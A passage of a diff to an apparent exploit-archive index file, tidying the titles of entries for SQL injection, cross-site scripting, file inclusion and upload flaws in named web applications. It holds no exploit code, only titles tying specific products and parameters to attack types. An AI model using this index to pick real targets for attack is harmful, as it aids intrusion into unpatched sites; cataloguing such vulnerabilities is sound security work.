-34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes - 'admin-ajax.php' 'img' Parameter Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 +34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes - 'admin-ajax.php img' Parameter Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Persistent Cross-Site Scripting",2014-09-01,"Prakhar Prasad",multiple,webapps,0 34514,platforms/php/webapps/34514.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 34518,platforms/jsp/webapps/34518.txt,"ManageEngine DesktopCentral - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",jsp,webapps,0 @@ -34381,7 +34383,7 @@ id,file,description,date,author,platform,type,port 34689,platforms/php/webapps/34689.txt,"Smart Magician Blog 1.0 - Multiple SQL Injections",2009-08-27,Evil-Cod3r,php,webapps,0 34690,platforms/php/webapps/34690.txt,"@Mail 6.1.9 - 'MailType' Parameter Cross-Site Scripting",2010-09-21,"Vicente Aguilera Diaz",php,webapps,0 34692,platforms/php/webapps/34692.txt,"WebAsyst Shop-Script PREMIUM - 'SearchString' Parameter Cross-Site Scripting",2009-07-27,u.f.,php,webapps,0 -34693,platforms/php/webapps/34693.txt,"Free Arcade Script 1.0 - 'search' Field Cross-Site Scripting",2009-08-27,"599eme Man",php,webapps,0 +34693,platforms/php/webapps/34693.txt,"Free Arcade Script 1.0 - 'search' Cross-Site Scripting",2009-08-27,"599eme Man",php,webapps,0 34694,platforms/php/webapps/34694.txt,"Clipbucket 1.7.1 - Multiple SQL Injections",2009-07-24,Qabandi,php,webapps,0 34699,platforms/php/webapps/34699.txt,"OpenText LiveLink 9.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-09-23,"Alejandro Ramos",php,webapps,0 34700,platforms/php/webapps/34700.txt,"WebShop Hun 1.062s - 'index.php' Local File Inclusion / Cross-Site Scripting",2009-07-24,u.f.,php,webapps,0 @@ -34449,11 +34451,11 @@ id,file,description,date,author,platform,type,port 34776,platforms/php/webapps/34776.txt,"HotScripts Type PHP Clone Script - lostpassword.php msg Parameter Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN - ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80 34783,platforms/php/webapps/34783.txt,"Scriptsez Ultimate Poll - 'demo_page.php' Cross-Site Scripting",2009-07-16,Moudi,php,webapps,0 -34784,platforms/php/webapps/34784.txt,"Micro CMS 1.0 - 'name' Field HTML Injection",2010-09-28,"Veerendra G.G",php,webapps,0 +34784,platforms/php/webapps/34784.txt,"Micro CMS 1.0 - 'name' HTML Injection",2010-09-28,"Veerendra G.G",php,webapps,0 34785,platforms/php/webapps/34785.txt,"PHPMyFAQ 2.6.x - 'index.php' Cross-Site Scripting",2010-09-28,"Yam Mesicka",php,webapps,0 34786,platforms/php/webapps/34786.txt,"eCardMAX - Multiple Cross-Site Scripting Vulnerabilities",2009-07-14,Moudi,php,webapps,0 34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl - manager/index.php modahsh Parameter Cross-Site Scripting",2010-09-29,"John Leitch",php,webapps,0 -34788,platforms/php/webapps/34788.txt,"MODx manager - '/controllers/default/resource/tvs.php' 'class_key' Parameter Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0 +34788,platforms/php/webapps/34788.txt,"MODx manager - '/controllers/default/resource/tvs.php class_key' Parameter Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0 34789,platforms/php/webapps/34789.html,"Getsimple CMS 2.01 - 'changedata.php' Cross-Site Scripting",2010-09-29,"High-Tech Bridge SA",php,webapps,0 34790,platforms/php/webapps/34790.txt,"Pluck CMS 4.6.3 - 'cont1' Parameter HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps,0 34791,platforms/php/webapps/34791.txt,"Swinger Club Portal - start.php id Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 @@ -34493,7 +34495,7 @@ id,file,description,date,author,platform,type,port 34847,platforms/php/webapps/34847.txt,"PHP Easy Shopping Cart 3.1R - 'subitems.php' Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Parameter Local/Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 34850,platforms/php/webapps/34850.txt,"eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0 -34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 - 'joblogs.php' 'jobid Parameter SQL Injection",2014-10-02,wishnusakti,php,webapps,80 +34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 - 'joblogs.php jobid Parameter SQL Injection",2014-10-02,wishnusakti,php,webapps,80 34852,platforms/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",windows,webapps,80 34854,platforms/php/webapps/34854.txt,"WordPress Plugin All In One WP Security & Firewall 3.8.3 - Persistent Cross-Site Scripting",2014-10-02,Vulnerability-Lab,php,webapps,80 34858,platforms/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - Cross-Site Request Forgery",2014-10-02,"Krusty Hack",php,webapps,80 @@ -34524,10 +34526,10 @@ id,file,description,date,author,platform,type,port 34922,platforms/php/webapps/34922.txt,"WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 35024,platforms/php/webapps/35024.txt,"Joomla! Component Catalogue - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0 -34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - '/riddles/results.php' 'searchQuery' Parameter Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 -34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles - '/riddles/list.php' 'catid' Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0 +34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - '/riddles/results.php searchQuery' Parameter Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 +34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles - '/riddles/list.php catid' Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0 34904,platforms/php/webapps/34904.txt,"Radvision Scopia - 'entry/index.jsp' Cross-Site Scripting",2009-08-24,"Francesco Bianchino",php,webapps,0 -34905,platforms/php/webapps/34905.txt,"W-Agora 4.2.1 - 'search.php3' 'bn' Parameter Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps,0 +34905,platforms/php/webapps/34905.txt,"W-Agora 4.2.1 - 'search.php3 bn' Parameter Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps,0 34906,platforms/php/webapps/34906.txt,"W-Agora 4.2.1 - search.php bn Parameter Cross-Site Scripting",2010-10-22,MustLive,php,webapps,0 34907,platforms/multiple/webapps/34907.txt,"IBM Tivoli Access Manager for E-Business - ivt/ivtserver parm1 Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 34908,platforms/multiple/webapps/34908.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/acl method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 @@ -34713,7 +34715,7 @@ id,file,description,date,author,platform,type,port 35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Parameter Cross-Site Scripting",2011-01-30,"Avram Marius",php,webapps,0 35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting / Local File Inclusion",2011-02-01,"Yam Mesicka",php,webapps,0 -35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 - 'picture.php' 'rate' Parameter SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 +35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 - 'picture.php rate' Parameter SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 35218,platforms/php/webapps/35218.txt,"WordPress Plugin SupportEzzy Ticket System 1.2.5 - Persistent Cross-Site Scripting",2014-11-12,"Halil Dalabasmaz",php,webapps,80 35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0 35220,platforms/multiple/webapps/35220.txt,"Joomla! Component 'com_hdflvplayer' < 2.1.0.1 - SQL Injection",2014-11-13,"Claudio Viviani",multiple,webapps,0 @@ -34805,7 +34807,7 @@ id,file,description,date,author,platform,type,port 35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 - Command Injection",2014-11-24,"Core Security",cgi,webapps,80 35360,platforms/php/webapps/35360.txt,"WSN Guest 1.24 - 'wsnuser' Cookie Parameter SQL Injection",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps,0 35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 -35365,platforms/php/webapps/35365.py,"PHPMyRecipes 1.2.2 - 'dosearch.php' 'words_exact Parameter SQL Injection",2014-11-25,bard,php,webapps,80 +35365,platforms/php/webapps/35365.py,"PHPMyRecipes 1.2.2 - 'dosearch.php words_exact Parameter SQL Injection",2014-11-25,bard,php,webapps,80 35367,platforms/php/webapps/35367.txt,"Crea8Social 1.3 - Persistent Cross-Site Scripting",2014-11-25,"Halil Dalabasmaz",php,webapps,80 35371,platforms/php/webapps/35371.txt,"WordPress Plugin Google Document Embedder 2.5.14 - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80 35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 - Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80 @@ -34937,7 +34939,7 @@ id,file,description,date,author,platform,type,port 35584,platforms/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35588,platforms/php/webapps/35588.rb,"Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,webapps,9000 -35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - 'browse.php' 'category' Parameter SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80 +35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - 'browse.php category' Parameter SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80 35593,platforms/windows/webapps/35593.txt,"SysAid Server - Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0 35594,platforms/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443 35596,platforms/php/webapps/35596.txt,"eGroupWare 1.8.1 - 'test.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0 @@ -35402,15 +35404,15 @@ id,file,description,date,author,platform,type,port 36329,platforms/php/webapps/36329.txt,"TA.CMS - (TeachArabia) lang Parameter Traversal Local File Inclusion",2011-11-22,CoBRa_21,php,webapps,0 36330,platforms/php/webapps/36330.txt,"Dolibarr ERP/CRM 3.1 - Multiple Script URI Cross-Site Scripting",2011-11-23,"High-Tech Bridge SA",php,webapps,0 36331,platforms/php/webapps/36331.txt,"Dolibarr ERP/CRM - '/user/index.php' Multiple Parameter SQL Injections",2011-11-23,"High-Tech Bridge SA",php,webapps,0 -36332,platforms/php/webapps/36332.txt,"Dolibarr ERP/CRM - '/user/info.php' 'id' Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 -36333,platforms/php/webapps/36333.txt,"Dolibarr ERP/CRM - '/admin/boxes.php' 'rowid' Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 +36332,platforms/php/webapps/36332.txt,"Dolibarr ERP/CRM - '/user/info.php id' Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 +36333,platforms/php/webapps/36333.txt,"Dolibarr ERP/CRM - '/admin/boxes.php rowid' Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 36338,platforms/php/webapps/36338.txt,"WordPress Plugin ClickDesk Live Support 2.0 - 'cdwidget' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 36339,platforms/php/webapps/36339.txt,"WordPress Plugin Featurific For WordPress 1.6.2 - 'snum' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 36340,platforms/php/webapps/36340.txt,"WordPress Plugin NewsLetter Meenews 5.1 - 'idnews' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 40008,platforms/php/webapps/40008.txt,"Getsimple CMS 3.3.10 - Arbitrary File Upload",2016-06-23,s0nk3y,php,webapps,80 36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 - modules/mondialrelay/googlemap.php Multiple Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 -36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 - '/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php' 'Expedition' Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 +36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 - '/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition' Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 36344,platforms/php/webapps/36344.txt,"PrestaShop 1.4.4.1 - '/admin/ajaxfilemanager/ajax_save_text.php' Multiple Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 36345,platforms/php/webapps/36345.txt,"Prestashop 1.4.4.1 - 'displayImage.php' HTTP Response Splitting",2011-11-23,RGouveia,php,webapps,0 36346,platforms/php/webapps/36346.txt,"Zen Cart CMS 1.3.9h - Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,RPinto,php,webapps,0 @@ -35429,8 +35431,8 @@ id,file,description,date,author,platform,type,port 36363,platforms/php/webapps/36363.txt,"WordPress Plugin Skysa App Bar - 'idnews' Parameter Cross-Site Scripting",2011-11-28,Amir,php,webapps,0 36364,platforms/php/webapps/36364.txt,"Manx 1.0.1 - admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php Multiple Parameter Cross-Site Scripting",2011-11-28,LiquidWorm,php,webapps,0 36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 - admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php Multiple Parameter Cross-Site Scripting",2011-11-28,LiquidWorm,php,webapps,0 -36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 - '/admin/admin_blocks.php' 'Filename' Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 -36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 - '/admin/admin_pages.php' 'Filename' Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 +36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 - '/admin/admin_blocks.php Filename' Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 +36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 - '/admin/admin_pages.php Filename' Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 36368,platforms/php/webapps/36368.txt,"WoltLab Community Gallery - Persistent Cross-Site Scripting",2015-03-13,"ITAS Team",php,webapps,0 36369,platforms/xml/webapps/36369.txt,"Citrix Netscaler NS10.5 - WAF Bypass (Via HTTP Header Pollution)",2015-03-12,"BGA Security",xml,webapps,0 36371,platforms/php/webapps/36371.txt,"Codiad 2.5.3 - Local File Inclusion",2015-03-12,"TUNISIAN CYBER",php,webapps,0 @@ -35510,7 +35512,7 @@ id,file,description,date,author,platform,type,port 36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",php,webapps,0 36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 - 'status' Parameter SQL Injection",2011-12-29,SiteWatch,php,webapps,0 36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross-Site Scripting",2011-12-29,SiteWatch,php,webapps,0 -36497,platforms/php/webapps/36497.txt,"UBBCentral UBB.Threads 7.5.6 - 'Username' Field Cross-Site Scripting",2012-01-04,sonyy,php,webapps,0 +36497,platforms/php/webapps/36497.txt,"UBBCentral UBB.Threads 7.5.6 - 'Username' Cross-Site Scripting",2012-01-04,sonyy,php,webapps,0 36498,platforms/php/webapps/36498.txt,"Yaws-Wiki 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0 36499,platforms/php/webapps/36499.txt,"StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0 36508,platforms/php/webapps/36508.txt,"VertrigoServ 2.25 - 'extensions.php' Script Cross-Site Scripting",2012-01-05,"Stefan Schurtz",php,webapps,0 @@ -35598,7 +35600,7 @@ id,file,description,date,author,platform,type,port 36623,platforms/php/webapps/36623.txt,"Ultimate Locator - 'radius' Parameter SQL Injection",2012-01-24,"Robert Cooper",php,webapps,0 36624,platforms/php/webapps/36624.txt,"Joomla! Component JE Story Submit - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps,0 36625,platforms/php/webapps/36625.txt,"OSClass 2.3.3 - 'index.php' sCategory Parameter SQL Injection",2012-01-25,"High-Tech Bridge SA",php,webapps,0 -36626,platforms/php/webapps/36626.txt,"OSClass 2.3.3 - 'index.php' 'getParam()' Function Multiple Parameter Cross-Site Scripting",2012-01-25,"High-Tech Bridge SA",php,webapps,0 +36626,platforms/php/webapps/36626.txt,"OSClass 2.3.3 - 'index.php getParam()' Multiple Parameter Cross-Site Scripting",2012-01-25,"High-Tech Bridge SA",php,webapps,0 36627,platforms/php/webapps/36627.txt,"DClassifieds 0.1 final - Cross-Site Request Forgery",2012-01-25,"High-Tech Bridge SA",php,webapps,0 36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion",2012-01-25,PacketiK,php,webapps,0 36629,platforms/php/webapps/36629.txt,"Joomla! Component com_motor - 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0 @@ -35713,8 +35715,8 @@ id,file,description,date,author,platform,type,port 36774,platforms/php/webapps/36774.txt,"WordPress Plugin MiwoFTP 1.0.5 - Arbitrary File Download (1)",2015-04-15,"Necmettin COSKUN",php,webapps,0 36807,platforms/php/webapps/36807.txt,"GoAutoDial 3.3-1406088000 - Multiple Vulnerabilities",2015-04-21,"Chris McCurley",php,webapps,80 36777,platforms/php/webapps/36777.txt,"WordPress Plugin Ajax Store Locator 1.2 - SQL Injection",2015-04-16,"Claudio Viviani",php,webapps,80 -36784,platforms/php/webapps/36784.txt,"11in1 CMS 1.2.1 - 'index.php' 'class' Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 -36785,platforms/php/webapps/36785.txt,"11in1 CMS 1.2.1 - 'admin/index.php' 'class' Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 +36784,platforms/php/webapps/36784.txt,"11in1 CMS 1.2.1 - 'index.php class' Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 +36785,platforms/php/webapps/36785.txt,"11in1 CMS 1.2.1 - 'admin/index.php class' Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36786,platforms/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Cross-Site Request Forgery (Admin Password)",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36787,platforms/php/webapps/36787.txt,"LEPTON 1.1.3 - Cross-Site Scripting",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36790,platforms/php/webapps/36790.txt,"Tube Ace - 'q' Parameter Cross-Site Scripting",2012-02-16,"Daniel Godoy",php,webapps,0 @@ -35765,13 +35767,13 @@ id,file,description,date,author,platform,type,port 36883,platforms/php/webapps/36883.txt,"Webglimpse 2.x - Multiple Cross-Site Scripting Vulnerabilities",2012-02-26,MustLive,php,webapps,0 36885,platforms/php/webapps/36885.txt,"Bontq - 'user/' URI Cross-Site Scripting",2012-02-27,sonyy,php,webapps,0 36886,platforms/php/webapps/36886.txt,"OSQA's CMS - Multiple HTML Injection Vulnerabilities",2012-02-27,"Ucha Gobejishvili",php,webapps,0 -36888,platforms/php/webapps/36888.html,"Dotclear 2.4.1.2 - '/admin/auth.php' 'login_data' Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 -36889,platforms/php/webapps/36889.txt,"Dotclear 2.4.1.2 - '/admin/blogs.php' 'nb' Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36888,platforms/php/webapps/36888.html,"Dotclear 2.4.1.2 - '/admin/auth.php login_data' Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36889,platforms/php/webapps/36889.txt,"Dotclear 2.4.1.2 - '/admin/blogs.php nb' Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36890,platforms/php/webapps/36890.txt,"Dotclear 2.4.1.2 - '/admin/comments.php' Multiple Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 -36891,platforms/php/webapps/36891.txt,"Dotclear 2.4.1.2 - '/admin/plugin.php' 'page' Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36891,platforms/php/webapps/36891.txt,"Dotclear 2.4.1.2 - '/admin/plugin.php page' Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36892,platforms/php/webapps/36892.html,"Traidnt Topics Viewer 2.0 - 'main.php' Cross-Site Request Forgery",2012-02-29,"Green Hornet",php,webapps,0 36893,platforms/php/webapps/36893.txt,"Fork CMS 3.x - private/en/locale/index name Parameter Cross-Site Scripting",2012-02-28,anonymous,php,webapps,0 -36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x - 'backend/modules/error/actions/index.php' 'parse()' Function Multiple Parameter Error Display Cross-Site Scripting",2012-02-28,anonymous,php,webapps,0 +36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x - 'backend/modules/error/actions/index.php parse()' Multiple Parameter Error Display Cross-Site Scripting",2012-02-28,anonymous,php,webapps,0 36895,platforms/php/webapps/36895.txt,"starCMS - 'q' Parameter URI Cross-Site Scripting",2012-03-02,Am!r,php,webapps,0 36897,platforms/php/webapps/36897.txt,"LastGuru ASP Guestbook - 'View.asp' SQL Injection",2012-03-04,demonalex,php,webapps,0 36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 - search.php Multiple Parameter Cross-Site Scripting",2012-03-05,"Aung Khant",php,webapps,0 @@ -35781,8 +35783,8 @@ id,file,description,date,author,platform,type,port 36916,platforms/php/webapps/36916.txt,"Exponent CMS 2.0 - 'src' Parameter SQL Injection",2012-03-07,"Rob Miller",php,webapps,0 36917,platforms/php/webapps/36917.txt,"OSClass 2.3.x - Directory Traversal / Arbitrary File Upload",2012-03-07,"Filippo Cavallarin",php,webapps,0 36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x - 'select_users_template' Parameter Local File Inclusion",2012-03-05,"Aung Khant",php,webapps,0 -36911,platforms/php/webapps/36911.txt,"11in1 CMS 1.2.1 - 'admin/comments' 'topicID' Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 -36912,platforms/php/webapps/36912.txt,"11in1 CMS 1.2.1 - 'admin/tps' 'id' Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 +36911,platforms/php/webapps/36911.txt,"11in1 CMS 1.2.1 - 'admin/comments topicID' Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 +36912,platforms/php/webapps/36912.txt,"11in1 CMS 1.2.1 - 'admin/tps id' Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 36913,platforms/php/webapps/36913.pl,"Joomla! 2.5.1 - 'redirect.php' Time Based SQL Injection",2012-03-05,"Colin Wong",php,webapps,0 36904,platforms/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - Local File Inclusion",2015-05-04,Vulnerability-Lab,ios,webapps,0 36973,platforms/php/webapps/36973.txt,"GNUBoard 4.34.20 - 'download.php' HTML Injection",2012-03-20,wh1ant,php,webapps,0 @@ -35800,8 +35802,8 @@ id,file,description,date,author,platform,type,port 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - listing.aspx searchText Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 -36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - '/help/helpredir.aspx' 'guide' Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 -36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System - '/webi/webi_modify.aspx' 'id' Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 +36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - '/help/helpredir.aspx guide' Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 +36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System - '/webi/webi_modify.aspx id' Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 36937,platforms/php/webapps/36937.html,"PHPMyVisites 2.4 - PHPmv2/index.php Multiple Cross-Site Scripting Vulnerabilities",2012-03-09,AkaStep,php,webapps,0 36938,platforms/php/webapps/36938.txt,"Singapore 0.10.1 - 'gallery' Parameter Cross-Site Scripting",2012-03-11,T0xic,php,webapps,0 36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 - 'issuer' Parameter Cross-Site Scripting",2012-03-11,MustLive,java,webapps,0 @@ -35810,7 +35812,7 @@ id,file,description,date,author,platform,type,port 36942,platforms/php/webapps/36942.txt,"WordPress Plugin Freshmail 1.5.8 - 'shortcode.php' SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal",2015-05-07,Vulnerability-Lab,ios,webapps,0 36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross-Site Scripting",2012-03-12,"Simon Ganiere",php,webapps,0 -36946,platforms/php/webapps/36946.txt,"Wikidforum 2.10 - Advanced Search - Multiple Field SQL Injection",2012-03-12,"Stefan Schurtz",php,webapps,0 +36946,platforms/php/webapps/36946.txt,"Wikidforum 2.10 - Advanced Search Multiple Field SQL Injection",2012-03-12,"Stefan Schurtz",php,webapps,0 36947,platforms/php/webapps/36947.txt,"Wikidforum 2.10 - Search Field Cross-Site Scripting",2012-03-12,"Stefan Schurtz",php,webapps,0 36948,platforms/php/webapps/36948.txt,"Wikidforum 2.10 - Advanced Search Multiple Field Cross-Site Scripting",2012-03-12,"Stefan Schurtz",php,webapps,0 36949,platforms/php/webapps/36949.txt,"Xeams 4.5 Build 5755 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5272 @@ -35842,7 +35844,7 @@ id,file,description,date,author,platform,type,port 36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Directory Traversal",2015-05-11,hyp3rlinx,php,webapps,0 36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 - 'index.php' Cross-Site Scripting",2012-03-21,"Stefan Schurtz",php,webapps,0 36999,platforms/php/webapps/36999.txt,"Open Journal Systems (OJS) 2.3.6 - 'index.php' authors[][url] Parameter Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0 -37000,platforms/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 - '/lib/pkp/classes/core/String.inc.php' 'String::stripUnsafeHtml()' Method Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0 +37000,platforms/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 - '/lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml()' Method Cross-Site Scripting",2012-03-21,"High-Tech 